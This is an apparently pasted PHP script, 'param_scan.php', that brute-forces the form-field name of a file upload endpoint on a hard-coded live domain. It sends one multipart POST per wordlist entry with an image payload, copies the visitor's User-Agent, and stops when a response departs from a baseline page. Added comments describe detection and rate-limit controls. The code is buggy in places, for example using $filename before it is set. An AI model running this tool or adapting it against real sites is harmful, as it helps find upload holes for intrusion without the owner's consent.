tobitaz

param_scan.php

Jun 26th, 2021
  1. <?php
  // Remove PHP's execution-time ceiling so the run is not cut short while it
  // works through the whole wordlist.
  ini_set('max_execution_time', '0');
  set_time_limit(0);

  // Endpoint every request is sent to (hard-coded by the paste's author).
  $url = 'https://redspino.com/include/upload.php';

  // The User-Agent of whoever loads this script is reused for the outbound
  // requests, so the target's logs show that browser string rather than a
  // cURL default.
  $useragent = $_SERVER['HTTP_USER_AGENT'];

  // Declared here and imported by parasc(), but never handed to cURL in the
  // code shown.
  $timeout = 10;

  // Evaluated before $filename receives its value further down.
  $file = realpath($filename);

  // Wordlist of candidate form-field names, one per line.
  $dict = 'param.txt';
  $wordlist = file_get_contents($dict);

  // Small image used as the upload payload name.
  $filename = 'noel.jpg';

  // Baseline copy of the endpoint's response to a plain GET; cek() compares
  // later responses against it.
  $kon = file_get_contents($url);

  // Number of line breaks in the wordlist, used as the progress denominator.
  $saiz = substr_count($wordlist, PHP_EOL);

  // Set to "ON" when the upload endpoint prints an error message, which
  // enables the response comparison in the main loop.
  $page = 'OFF';
  19.  
  20.  
  21.  
  /**
   * Send one POST to the configured endpoint with a single form field whose
   * name is the candidate under test.
   *
   * Because CURLOPT_POSTFIELDS receives an array, the request body is
   * multipart/form-data. The field value uses the legacy "@path;filename="
   * notation; PHP builds that enforce safe upload send it as a plain string
   * rather than attaching a file.
   *
   * Seen from the receiving server, a run looks like a stream of POSTs to one
   * path from one client, identical except for the form-field name. Logging
   * unexpected field names, rate-limiting the endpoint and requiring
   * authentication before any upload handling are the matching controls.
   *
   * @param string $para Candidate form-field name (one wordlist entry).
   * @return string|bool Response body from curl_exec(), or false on failure.
   */
  function parasc($para)
  {
      // $timeout is imported as in the original even though it is not used.
      global $url, $useragent, $timeout, $file, $filename;

      $data = array($para => "@{$file};filename={$filename}");

      $options = array(
          CURLOPT_URL            => $url,
          CURLOPT_USERAGENT      => $useragent,
          CURLOPT_POST           => 1,
          CURLOPT_POSTFIELDS     => $data,
          CURLOPT_RETURNTRANSFER => 1,
      );

      $ch = curl_init();
      foreach ($options as $option => $value) {
          curl_setopt($ch, $option, $value);
      }
      $result = curl_exec($ch);
      curl_close($ch);

      return $result;
  }
  41.  
  /**
   * Compare a response body with the baseline page held in the global $kon.
   *
   * The check is a plain substring search: a response that still contains the
   * whole baseline counts as "unchanged". Any other response counts as
   * "different", whatever the reason for the difference.
   *
   * @param string $konten Response body returned by parasc().
   * @return int 0 when the baseline occurs inside $konten, 1 otherwise.
   */
  function cek($konten)
  {
      global $kon;

      return strpos($konten, $kon) === false ? 1 : 0;
  }
  52.  
  // Run banner: endpoint, wordlist file, entry count and payload path.
  echo "Start scaning param : {$url}<br />\n    Wordlist : {$dict}<br >\n    Word count : {$saiz}<br />\n    File upload : {$file}<br /><hr>";

  $word = explode(PHP_EOL, $wordlist);

  // Main loop: one POST per wordlist line, sent back-to-back with no delay.
  // In the endpoint's access log this is a burst of POSTs to a single path
  // from one source with one User-Agent, so per-client rate limits and alerts
  // on repeated upload attempts apply directly.
  $count = 0;
  foreach ($word as $key => $wl) {
      // Drop stray CR/LF left over from splitting on PHP_EOL.
      $w = preg_replace("/\r|\n/", "", $wl);

      if ($page == "ON") {
          // Response-comparison mode: stop at the first reply that no longer
          // contains the baseline page.
          $res = cek(parasc($w));
          if ($res == 1) {
              echo "<br />{$w}:found!<br />";
              die();
          }
      } else {
          // Blind mode: the reply is discarded, so the script itself reports
          // nothing about which field name the endpoint accepted.
          parasc($w);
      }

      // Progress output: a dot per request, plus a percentage line once the
      // counter passes 20.
      $count++;

      echo ".";
      flush();

      if ($count > 20) {
          $persen = 100 * $key / $saiz;
          $per    = round($persen, 2);
          echo "{$per}% scaning[{$key}]<br />";
          // Kept as in the original: the counter is unset, not set to zero.
          unset($count);
      }
  }

  echo "done";
  108.  
  109.  
  110. ?>